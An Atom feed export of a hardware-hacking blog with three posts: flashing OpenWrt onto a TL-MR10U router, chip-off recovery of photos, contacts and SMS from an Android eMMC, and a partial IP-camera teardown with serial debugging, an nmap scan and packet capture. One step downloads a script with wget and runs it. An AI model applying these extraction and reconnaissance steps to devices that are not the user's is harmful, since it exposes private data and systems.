<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>IterNull Blog</title>
<subtitle>Everything is networked, everything can be hacked;</subtitle>
<link href="/atom.xml" rel="self"/>
<link href="https://blog.iternull.com/"/>
<updated>2018-12-28T15:39:31.261Z</updated>
<id>https://blog.iternull.com/</id>
<author>
<name>IterNull</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>TP-Link TL-MR10U Install Breed Bootloader + OpenWrt</title>
<link href="https://blog.iternull.com/posts/2018/12/26/TP-Link-TL-MR10U-Install-Breed-Bootloader-and-OpenWrt.html"/>
<id>https://blog.iternull.com/posts/2018/12/26/TP-Link-TL-MR10U-Install-Breed-Bootloader-and-OpenWrt.html</id>
<published>2018-12-26T15:14:20.000Z</published>
<updated>2018-12-28T15:39:31.261Z</updated>
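<content type="html"><![CDATA[<p>I picked up a second-hand TL-MR10U to upgrade its hardware myself, install OpenWrt, and pair it with a LAN-Tap as a convenient, carry-anywhere packet-capture tool.<br>It also has its own battery, which saves dragging a power bank around. The OpenWrt site has a <a href="https://openwrt.org/toh/views/toh_battery-powered" target="_blank" rel="noopener">Table of Hardware: Battery powered</a> page listing every officially supported "power bank" that can be flashed with OpenWrt.<br><a id="more"></a><br><img src="//files.iternull.com/images/2018-12-26_01-0001.jpg" alt=""></p><h2 id="升级硬件"><a href="#升级硬件" class="headerlink" title="升级硬件"></a>Upgrading the hardware</h2><p>You need to buy a 64MB RAM chip (HY5DU121622DTP-D43) and a 16MB FLASH chip (W25Q128); have a hot-air rework station, a soldering iron, flux, tweezers and similar tools ready; and get a CH341A programmer plus a wide-body SOP8 programming socket.<br>For the actual procedure, look for a video online. Do not press desoldering braid against the pads with the iron and drag it to remove the leftover high-temperature solder on the memory pads; you will certainly tear the pads off. It is enough to cover the surrounding components with high-temperature tape, add a little flux to the pads, and solder the new part on with the hot-air gun.<br>Take a photo before removing anything so you remember where pin 1 of the original part sits and do not solder the new one in the wrong orientation.</p><h2 id="备份原始固件"><a href="#备份原始固件" class="headerlink" title="备份原始固件"></a>Backing up the original firmware</h2><p>Read the entire contents of the removed FLASH with the programmer and save them to a backup file, then write that data to the new 64MB FLASH chip, and finally solder the new FLASH back onto the board.</p><h2 id="刷入-Breed-Bootloader"><a href="#刷入-Breed-Bootloader" class="headerlink" title="刷入 Breed Bootloader"></a>Flashing Breed Bootloader</h2><p>Download the <a href="https://pan.baidu.com/s/1OCUnvfjJHJar7Pk0Lgt_uQ" target="_blank" rel="noopener">openwr-ar71xx-generic-tl-mr10u-v1-squashfs-factory.bin</a> firmware, which is built with unlocked partitions and is used to flash U-Boot.<br>Once it is downloaded, upload it as a firmware upgrade in the stock TP-Link web console, with the TL-MR10U connected to the computer by Ethernet cable, and wait a few minutes for the router to finish rebooting.</p><p>Use the <code>scp</code> tool that ships with git-bash to upload Breed Bootloader to the <code>/tmp</code> directory on the TL-MR10U.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scp breed-ar9331-mr12u-r1163.bin root@192.168.1.1:/tmp/</span><br></pre></td></tr></table></figure><p>Log in to the TL-MR10U over SSH</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh root@192.168.1.1</span><br></pre></td></tr></table></figure><p>Back up U-Boot & ART</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span 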
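class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">cat /proc/mtd</span><br><span class="line">dd <span class="keyword">if</span>=/dev/mtd0 of=/tmp/u-boot.bin</span><br><span class="line">dd <span class="keyword">if</span>=/dev/mtd4 of=/tmp/art.bin</span><br><span class="line">scp root@192.168.1.1:/tmp/*.bin . <span class="comment"># Run this in a terminal on your computer; it copies the files from the router to the computer</span></span><br></pre></td></tr></table></figure><p>Flash the new <a href="https://breed.hackpascal.net/EOL/breed-ar9331-mr12u-r1163.bin" target="_blank" rel="noopener">Breed Bootloader</a></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mtd -r write /tmp/breed-ar9331-mr12u-r1163.bin u-boot</span><br></pre></td></tr></table></figure><p>If you see Could not open mtd device: u-boot Can’t open device for writing! it means you are running an official OpenWrt release image, which locks the U-Boot partition by default; you need an image with unlocked partitions. To get one, either change the OpenWrt source configuration and rebuild it yourself, or download one that somebody else has built.</p><h2 id="还原-Atheros-ART"><a href="#还原-Atheros-ART" class="headerlink" title="还原 Atheros ART"></a>Restoring the Atheros ART</h2><ul><li>Note: if you replaced the FLASH chip, failing to restore the Atheros ART data will leave your router without working WiFi!</li></ul><p>The ART data holds the configuration and driver for the WiFi function; if ART is damaged or lost, the OpenWrt you install will have no wireless.<br>Hold the RESET button while powering on and keep holding it for about 5 seconds to enter Breed's recovery mode. With the router connected to the computer by Ethernet cable, enter <code>192.168.1.1</code> in a browser to open the Breed web recovery console.<br>Under 【固件更新】 (Firmware Update) choose 【编程器固件】 (Programmer Firmware), untick "keep ART" and tick only "keep Bootloader", then upload the FLASH dump file backed up earlier with the programmer.<br>Alternatively, restore directly from the ART backup made earlier.</p><p><img src="//files.iternull.com/images/2018-12-26_01-0002.png" alt=""></p><h2 id="安装-OpenWrt"><a href="#安装-OpenWrt" class="headerlink" title="安装 OpenWrt"></a>Installing OpenWrt</h2><p>After the restore completes and the router reboots, manually enter Breed recovery mode again. Under 【固件更新】 (Firmware Update) choose 【常规固件】 (Regular Firmware), tick only the firmware box, and upload the latest OpenWrt factory image; this is also a good moment to back up ART for later use. The firmware can be downloaded from the TL-MR10U page on the OpenWrt site.</p><p><img src="//files.iternull.com/images/2018-12-26_01-0003.png" alt=""></p><p>To install from the command line instead, the commands are:</p><figure class="highlight 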
bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">scp lede-17.01.6-ar71xx-generic-tl-mr10u-v1-squashfs-factory.bin root@192.168.1.1:/tmp/</span><br><span class="line">ssh root@192.168.1.1</span><br><span class="line">mtd -r write /tmp/lede-17.01.6-ar71xx-generic-tl-mr10u-v1-squashfs-factory.bin firmware</span><br></pre></td></tr></table></figure><p>OpenWrt TP-Link TL-MR10U: <a href="https://openwrt.org/toh/tp-link/tl-mr10u" target="_blank" rel="noopener">https://openwrt.org/toh/tp-link/tl-mr10u</a><br>Firmware OpenWrt Install: <a href="http://downloads.openwrt.org/releases/17.01.6/targets/ar71xx/generic/lede-17.01.6-ar71xx-generic-tl-mr10u-v1-squashfs-factory.bin" target="_blank" rel="noopener">lede-17.01.6-ar71xx-generic-tl-mr10u-v1-squashfs-factory.bin</a><br>Firmware OpenWrt Upgrade: <a href="http://downloads.openwrt.org/releases/17.01.6/targets/ar71xx/generic/lede-17.01.6-ar71xx-generic-tl-mr10u-v1-squashfs-sysupgrade.bin" target="_blank" rel="noopener">lede-17.01.6-ar71xx-generic-tl-mr10u-v1-squashfs-sysupgrade.bin</a></p><h2 id="配置-OpenWrt"><a href="#配置-OpenWrt" class="headerlink" title="配置 OpenWrt"></a>Configuring OpenWrt</h2><p>After installation, first set a password in the web console; configure the subnet so it does not conflict with other networks; configure wireless; and configure internet access, either over an Ethernet uplink or by joining another WiFi AP that has internet access.<br>If you want to reach this router's SSH and web console from outside its own subnet, remember to tick the option that allows access from remote hosts on the password settings page, and add firewall rules opening ports <code>22</code> and <code>80</code>.</p><p>Update the packages</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">opkg update</span><br><span class="line">opkg list-upgradable | cut -f 1 -d <span class="string">' '</span> | xargs opkg upgrade</span><br></pre></td></tr></table></figure><p>Enable USB drive mounting on OpenWrt</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">opkg install usbutils</span><br><span class="line">opkg install block-mount e2fsprogs kmod-usb-storage kmod-usb-storage-extras kmod-usb2 kmod-usb3 kmod-fs-ext4 kmod-fs-vfat</span><br><span class="line">opkg install kmod-nls-cp437 kmod-nls-iso8859-1 kmod-nls-utf8</span><br><span class="line">mkdir /mnt/sda1</span><br><span class="line">block detect > /etc/config/fstab </span><br><span class="line">uci <span class="built_in">set</span> fstab.@mount[0].enabled=<span class="string">'1'</span></span><br><span class="line">uci commit</span><br><span class="line">uci <span class="built_in">set</span> fstab.@global[0].check_fs=<span class="string">'1'</span></span><br><span class="line">uci commit</span><br><span class="line">block mount</span><br><span class="line">service fstab <span class="built_in">enable</span></span><br></pre></td></tr></table></figure><p>Install commonly used tools</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">opkg install tcpdump htop lsof</span><br></pre></td></tr></table></figure><h2 id="Link"><a href="#Link" class="headerlink" title="Link"></a>Link</h2><ul><li><a href="https://oldwiki.archive.openwrt.org/doc/howto/generic.flashing" target="_blank" rel="noopener">Installing OpenWrt [Old OpenWrt Wiki]</a></li><li><a href="https://openwrt.org/docs/guide-user/installation/restore_art_partition" target="_blank" rel="noopener">OpenWrt Project: How to restore ART partition</a></li><li><a href="https://openwrt.org/docs/guide-developer/quickstart-build-images" target="_blank" rel="noopener">OpenWrt Project: Quick Image 
Building Guide</a></li><li><a href="https://www.cnblogs.com/11hwu2/articles/3702313.html" target="_blank" rel="noopener">Openwrt中的Art区域 (The ART area in OpenWrt)</a></li></ul>]]></content>
<summary type="html">
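<p>I picked up a second-hand TL-MR10U to upgrade its hardware myself, install OpenWrt, and pair it with a LAN-Tap as a convenient, carry-anywhere packet-capture tool.<br>It also has its own battery, which saves dragging a power bank around. The OpenWrt site has a <a href="https://openwrt.org/toh/views/toh_battery-powered" target="_blank" rel="noopener">Table of Hardware: Battery powered</a> page listing every officially supported "power bank" that can be flashed with OpenWrt.<br>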
</summary>
<category term="OpenWrt" scheme="https://blog.iternull.com/tags/OpenWrt/"/>
<category term="Breed Bootloader" scheme="https://blog.iternull.com/tags/Breed-Bootloader/"/>
<category term="TL-MR10U" scheme="https://blog.iternull.com/tags/TL-MR10U/"/>
</entry>
<entry>
<title>Android eMMC Data Recovery</title>
<link href="https://blog.iternull.com/posts/2018/12/19/Android-eMMC-Data-Recovery.html"/>
<id>https://blog.iternull.com/posts/2018/12/19/Android-eMMC-Data-Recovery.html</id>
<published>2018-12-19T10:32:41.000Z</published>
<updated>2018-12-21T07:38:23.356Z</updated>
<content type="html"><![CDATA[<p>I recently upgraded the tools on my hardware bench and can now do BGA rework, so I dug out an Android phone that got water-damaged a few years ago to recover the data on it.<br>The idea is simply to remove the eMMC chip from the phone's mainboard, solder it onto a blank USB flash drive controller PCB, and read out the data. This only works for devices without full-disk encryption; for an iPhone or a full-disk-encrypted Android device, the only options are repairing the mainboard, or removing the ROM, CPU and Baseband chips and soldering them onto a working board of the same model, then booting and entering the passcode to see the data.<br><a id="more"></a><br><img src="//files.iternull.com/images/2018-12-19_01-0001.png" alt=""></p><h2 id="硬件拆焊"><a href="#硬件拆焊" class="headerlink" title="硬件拆焊"></a>Hardware rework</h2><p>Here I used an Alcor (安国) USB flash drive controller PCB; when buying one, look up the BGA package type for your phone's eMMC part number and pick the matching controller board. You can also use an eMMC-to-SD socket adapter, or solder jumper wires directly to an SD card adapter.</p><h2 id="读取-eMMC"><a href="#读取-eMMC" class="headerlink" title="读取 eMMC"></a>Reading the eMMC</h2><p>Here I use the method of soldering the eMMC onto the USB drive controller board to read the data.</p><h4 id="备份数据"><a href="#备份数据" class="headerlink" title="备份数据"></a>Back up the data</h4><p>First take an image backup of the soldered-up USB device; recovery then works on the image file, which avoids damaging the data by operating on the device directly.<br>Before imaging, confirm that the BGA soldering is good by checking whether the system recognises the device's partition table: on Windows look in Disk Management, on Linux use <code>fdisk -l</code>.<br>For imaging, on Windows you can use <a href="https://sourceforge.net/projects/win32diskimager/" target="_blank" rel="noopener">Win32 Disk Imager</a> or the <code>dd</code> command in git-bash; on Linux use <code>dd</code> as well.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dd <span class="keyword">if</span>=/dev/sda of=dump_0.img bs=1024</span><br></pre></td></tr></table></figure><h4 id="查看镜像文件的分区表"><a href="#查看镜像文件的分区表" class="headerlink" title="查看镜像文件的分区表"></a>Inspect the image's partition table</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">$ fdisk -l dump_0.img</span><br><span class="line">Ignoring extra data <span class="keyword">in</span> partition table 5.</span><br><span class="line">Ignoring extra data <span class="keyword">in</span> partition table 5.</span><br><span class="line">Disk dump_0.img: 3.6 GiB, 3875536896 bytes, 7569408 sectors</span><br><span class="line">Units: sectors of 1 * 512 = 512 bytes</span><br><span class="line">Sector size (logical/physical): 512 bytes / 512 bytes</span><br><span class="line">I/O size (minimum/optimal): 512 bytes / 512 bytes</span><br><span class="line">Disklabel <span class="built_in">type</span>: dos</span><br><span class="line">Disk identifier: 0xa91b46f7</span><br><span class="line"></span><br><span class="line">Device Boot Start End Sectors Size Id Type</span><br><span class="line">dump_0.img1 1024 4294968318 4294967295 2T 5 Extended</span><br><span class="line">dump_0.img2 26624 47103 20480 10M 83 Linux</span><br><span class="line">dump_0.img3 47104 67583 20480 10M 83 Linux</span><br><span class="line">dump_0.img4 101376 113663 12288 6M 83 Linux</span><br><span class="line">dump_0.img5 144384 1981439 1837056 897M 83 Linux</span><br><span class="line">dump_0.img6 4336640 4294968318 4290631679 2T 83 Linux</span><br></pre></td></tr></table></figure><h4 id="计算要挂载分区的位置"><a href="#计算要挂载分区的位置" class="headerlink" title="计算要挂载分区的位置"></a>Calculate the offset of the partition to mount</h4><p>Multiply the Start value of the partition you want to mount by the Units value to get the mount offset.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">echo</span> $((4336640*512))</span><br><span class="line">2220359680</span><br></pre></td></tr></table></figure><h4 id="创建挂载目录"><a href="#创建挂载目录" class="headerlink" title="创建挂载目录"></a>Create the mount point</h4><figure class="highlight 
bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mkdir /mnt/emmc</span><br></pre></td></tr></table></figure><h4 id="挂载指定分区"><a href="#挂载指定分区" class="headerlink" title="挂载指定分区"></a>Mount the chosen partition</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mount -o loop,offset=2220359680 dump_0.img /mnt/emmc/</span><br></pre></td></tr></table></figure><h4 id="打包备份分区内的文件"><a href="#打包备份分区内的文件" class="headerlink" title="打包备份分区内的文件"></a>Archive the files in the partition</h4><p>Once everything is archived, you can copy the archive to Windows and unpack it there to look at the individual files.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tar cvzf ~/dump_0_img6.tar.gz /mnt/emmc/</span><br></pre></td></tr></table></figure><h2 id="照片恢复"><a href="#照片恢复" class="headerlink" title="照片恢复"></a>Photo recovery</h2><p>Normally, photos that were never manually deleted should still be in the DCIM directory. Unfortunately I did not find the photos I had taken in DCIM, but there was a .thumbnails folder.<br>The .thumbnails folder contains some thumbnails and a .thumbdata5 cache file.</p><h4 id="从-thumbdata-恢复照片"><a href="#从-thumbdata-恢复照片" class="headerlink" title="从 .thumbdata 恢复照片"></a>Recovering photos from <code>.thumbdata</code></h4><p>Here a Python script reads the photos inside the .thumbdata file and saves them; alternatively you can use the web-based <a href="https://x0a.github.io/thumbdata3-viewer/" target="_blank" rel="noopener">HTML5 Thumbdata3 Viewer</a> to read it. <a href="https://files.iternull.com/script/python/thumbdata.py" target="_blank" rel="noopener">thumbdata.py</a> is my modified version of the script; the original comes from <a href="https://android.stackexchange.com/questions/58087/read-content-of-thumbdata-file" target="_blank" rel="noopener">Stack Exchange</a>.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> /mnt/emmc/</span><br><span class="line">$ find ./ -name '*thumbdata*'</span><br><span class="line">./DCIM/.thumbnails/.thumbdata5-1763508120_0</span><br><span class="line">$ mkdir ~/thumbnails</span><br><span class="line">$ cp DCIM/.thumbnails/.thumbdata5-1763508120_0 ~/thumbnails/</span><br><span class="line">$ <span class="built_in">cd</span> ~/thumbnails/</span><br><span class="line">$ wget https://files.iternull.com/script/python/thumbdata.py</span><br><span class="line">$ chmod 755 thumbdata.py</span><br><span class="line">$ ./thumbdata.py .thumbdata5-1763508120_0</span><br></pre></td></tr></table></figure><h2 id="联系人恢复"><a href="#联系人恢复" class="headerlink" title="联系人恢复"></a>Contact recovery</h2><p>Contacts are stored in the <code>contacts</code> and <code>view_contacts</code> tables of the <code>contacts2.db</code> database file under the <code>data/data/com.android.providers.contacts/databases/</code> directory.<br>Call history is stored in the <code>calls</code> table of the <code>calllog.db</code> database file under the <code>data/data/com.android.providers.contacts/databases/</code> directory.<br>Open the database files with <a href="https://sqlitebrowser.org/" target="_blank" rel="noopener">DB Browser for SQLite</a> to read the raw data.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> /mnt/emmc/</span><br><span class="line">$ find ./ -name contacts2.db</span><br><span class="line">./data/data/com.android.providers.contacts/databases/contacts2.db</span><br><span class="line">$ find ./ -name calllog.db</span><br><span class="line">./data/data/com.android.providers.contacts/databases/calllog.db</span><br></pre></td></tr></table></figure><h2 id="短信恢复"><a href="#短信恢复" class="headerlink" 
title="短信恢复"></a>SMS recovery</h2><p>SMS messages are stored in the <code>sms</code> table of the <code>mmssms.db</code> database file under the <code>data/data/com.android.providers.telephony/databases/</code> directory.<br>Open the database file with <a href="https://sqlitebrowser.org/" target="_blank" rel="noopener">DB Browser for SQLite</a> to read the raw data.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> /mnt/emmc/</span><br><span class="line">$ find ./ -name mmssms.db</span><br><span class="line">./data/data/com.android.providers.telephony/databases/mmssms.db</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
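<p>I recently upgraded the tools on my hardware bench and can now do BGA rework, so I dug out an Android phone that got water-damaged a few years ago to recover the data on it.<br>The idea is simply to remove the eMMC chip from the phone's mainboard, solder it onto a blank USB flash drive controller PCB, and read out the data. This only works for devices without full-disk encryption; for an iPhone or a full-disk-encrypted Android device, the only options are repairing the mainboard, or removing the ROM, CPU and Baseband chips and soldering them onto a working board of the same model, then booting and entering the passcode to see the data.<br>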
</summary>
<category term="Android" scheme="https://blog.iternull.com/tags/Android/"/>
<category term="eMMC" scheme="https://blog.iternull.com/tags/eMMC/"/>
<category term="Data Recovery" scheme="https://blog.iternull.com/tags/Data-Recovery/"/>
</entry>
<entry>
<title>Hacking IP Camera (和慧眼-C08)</title>
<link href="https://blog.iternull.com/posts/2017/12/26/Hacking-IP-Camera-Hehuiyan-C08.html"/>
<id>https://blog.iternull.com/posts/2017/12/26/Hacking-IP-Camera-Hehuiyan-C08.html</id>
<published>2017-12-25T18:12:27.000Z</published>
<updated>2018-05-31T09:43:30.280Z</updated>
<content type="html"><![CDATA[<p><a href="http://www.hehuiyan.com/" target="_blank" rel="noopener">和慧眼</a> (Hehuiyan) is a networked video surveillance service platform launched by China Mobile, with several smart camera models under the brand. The one studied here is the C08.<br>One difference between an IPCamera and a WebCam is that an IPCamera has no web console: you can only control the device through the vendor's app, not through a web page on the LAN.<br>IPCameras also generally have to connect to the internet and use the vendor's cloud platform, which means all of your data is sent to the cloud, and you may additionally have to pay to rent access to the cloud platform's features.<br><a id="more"></a></p><h2 id="1-拆解硬件"><a href="#1-拆解硬件" class="headerlink" title="1 拆解硬件"></a>1 Hardware teardown</h2><p><img src="//files.iternull.com/images/2017-12-26_01-0001.jpg" alt=""><br><img src="//files.iternull.com/images/2017-12-26_01-0002.jpg" alt=""></p><h2 id="2-串口调试"><a href="#2-串口调试" class="headerlink" title="2 串口调试"></a>2 Serial debugging</h2><p>Here we connect a CP2102 USB to TTL adapter to the device's UART interface, to which jumper wires have been soldered.</p><p><img src="//files.iternull.com/images/2017-12-26_01-0003.jpg" alt=""></p><p>Connect to the COM port with the PuTTY client and power the device on to start debugging.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span 
class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">U-Boot 2010.06-svn2464 (Jan 21 2015 - 09:06:53)</span><br><span class="line">DRAM: 256 MiB</span><br><span class="line">gBootLogPtr:80b80008.</span><br><span class="line">Check spi flash controller v350... Found</span><br><span class="line">Spi(cs1) ID: 0xEF 0x40 0x18 0x00 0x00 0x00</span><br><span class="line">reset/hold pin now is RESET</span><br><span class="line">Spi(cs1): Block:64KB Chip:16MB Name:<span class="string">"W25Q128B"</span></span><br><span class="line">boot from spi</span><br><span class="line">boot from spi</span><br><span class="line">partition file version 2</span><br><span class="line">rootfstype squashfs root /dev/mtdblock4</span><br><span class="line">In: serial</span><br><span class="line">Out: serial</span><br><span class="line">Err: serial</span><br><span class="line">TEXT_BASE:81000000</span><br><span class="line">state:ff,err_count:00</span><br><span class="line">support SD update</span><br><span class="line">MMC: Card did not respond to voltage select!</span><br><span class="line">No EMMC device found!!!</span><br><span class="line">Hisilicon ETH net controler</span><br><span class="line">No such device: 0:1</span><br><span class="line">No such device: 0:1</span><br><span class="line">No such device: 0:2</span><br><span class="line">No such device: 0:2</span><br><span class="line">Try again use 
backup_serverip</span><br><span class="line">Hisilicon ETH net controler</span><br><span class="line">No such device: 0:1</span><br><span class="line">No such device: 0:1</span><br><span class="line">No such device: 0:2</span><br><span class="line">No such device: 0:2</span><br><span class="line">Failed to get info.txt</span><br><span class="line">Fail to get info file!</span><br><span class="line">Init error!</span><br><span class="line">Hisilicon ETH net controler</span><br><span class="line">No such device: 0:1</span><br><span class="line">No such device: 0:1</span><br><span class="line">No such device: 0:2</span><br><span class="line">No such device: 0:2</span><br><span class="line"><span class="comment">## Booting kernel from Legacy Image at 82000000 ...</span></span><br><span class="line"> Image Name: Linux-3.0.8</span><br><span class="line"> Image Type: ARM Linux Kernel Image (uncompressed)</span><br><span class="line"> Data Size: 1042164 Bytes = 1017.7 KiB</span><br><span class="line"> Load Address: 80008000</span><br><span class="line"> Entry Point: 80008000</span><br><span class="line"> Loading Kernel Image ...OK</span><br><span class="line">OK</span><br><span class="line">boot from spi</span><br><span class="line">partition file version 2</span><br><span class="line">rootfstype squashfs root /dev/mtdblock4</span><br><span class="line">cmdLine mem=44M console=ttyS0,115200 root=/dev/mtdblock4 rootfstype=squashfs</span><br><span class="line"></span><br><span class="line">Starting kernel ...</span><br><span class="line">Uncompressing Linux... <span class="keyword">done</span>, booting the kernel.</span><br></pre></td></tr></table></figure><p>After several attempts, the debug output always stops at booting the kernel. 
with no shell and no login prompt. Logging in to a shell over the serial port has to be shelved for now.</p><h2 id="3-网络调试"><a href="#3-网络调试" class="headerlink" title="3 网络调试"></a>3 Network debugging</h2><h3 id="3-1-端口扫描"><a href="#3-1-端口扫描" class="headerlink" title="3.1 端口扫描"></a>3.1 Port scan</h3><p>Scan the device's open ports with Nmap</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">$ nmap -A 192.168.8.236</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.8.236</span><br><span class="line">Host is up (0.0080s latency).</span><br><span class="line">Not shown: 997 closed ports</span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">23/tcp open telnet security DVR telnetd (many brands)</span><br><span class="line">554/tcp open rtsp</span><br><span class="line">| fingerprint-strings:</span><br><span class="line">| SIPOptions:</span><br><span class="line">| RTSP/1.0 401 Unauthorized</span><br><span class="line">| CSeq: 42</span><br><span class="line">|_ 
WWW-Authenticate: Basic realm=<span class="string">"MediaServer3.0"</span></span><br><span class="line">|_rtsp-methods: ERROR: Script execution failed (use -d to debug)</span><br><span class="line">5000/tcp open upnp?</span><br><span class="line">1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :</span><br><span class="line">SF-Port554-TCP:V=7.40%I=7%D=1/4%Time=5A4E4B5D%P=arm-unknown-linux-gnueabih</span><br><span class="line">SF:f%r(SIPOptions,57,<span class="string">"RTSP/1\.0\x20401\x20Unauthorized\r\nCSeq:\x2042\r\nW</span></span><br><span class="line"><span class="string">SF:WW-Authenticate:\x20Basic\x20realm=\"MediaServer3\.0\"\r\n\r\n"</span>);</span><br><span class="line">MAC Address: E0:50:8B:35:74:02 (Zhejiang Dahua Technology)</span><br><span class="line">Device <span class="built_in">type</span>: general purpose</span><br><span class="line">Running: Linux 2.6.X|3.X</span><br><span class="line">OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3</span><br><span class="line">OS details: Linux 2.6.32 - 3.5</span><br><span class="line">Network Distance: 1 hop</span><br><span class="line"></span><br><span class="line">TRACEROUTE</span><br><span class="line">HOP RTT ADDRESS</span><br><span class="line">1 8.00 ms 192.168.8.236</span><br><span class="line"></span><br><span class="line">OS and Service detection performed. 
Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line"><span class="comment"># Nmap done at Thu Jan 4 23:42:28 2018 -- 1 IP address (1 host up) scanned in 116.06 seconds</span></span><br></pre></td></tr></table></figure><p>The scan shows three open ports on the device, <code>23</code> <code>554</code> <code>5000</code>, running Telnet, RTSP and (probably) UPnP respectively.</p><h3 id="3-2-网络数据包分析"><a href="#3-2-网络数据包分析" class="headerlink" title="3.2 网络数据包分析"></a>3.2 Network packet analysis</h3><p>Packets are captured here with an OpenWrt router that has <code>tcpdump</code> installed and supports external USB storage.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ mount /dev/sdb1 /mnt/usb/ # Mount the USB drive</span><br><span class="line">$ <span class="built_in">cd</span> /mnt/usb/pcap/ # Change into the directory on the USB drive</span><br><span class="line">$ tcpdump -i wlan0-1 -w wlan0-1_$(date +%s).<span class="built_in">cap</span> # Capture the traffic on the wireless interface</span><br></pre></td></tr></table></figure><p>After capturing for a while, open the <code>.pcap</code> file in Wireshark and analyse the IPCamera's traffic.</p><p><img src="//files.iternull.com/images/2017-12-26_01-0004.png" alt=""></p><h2 id="4-固件提取"><a href="#4-固件提取" class="headerlink" title="4 固件提取"></a>4 Firmware extraction</h2><h3 id="4-1-从-SPI-Flash-芯片里提取固件"><a 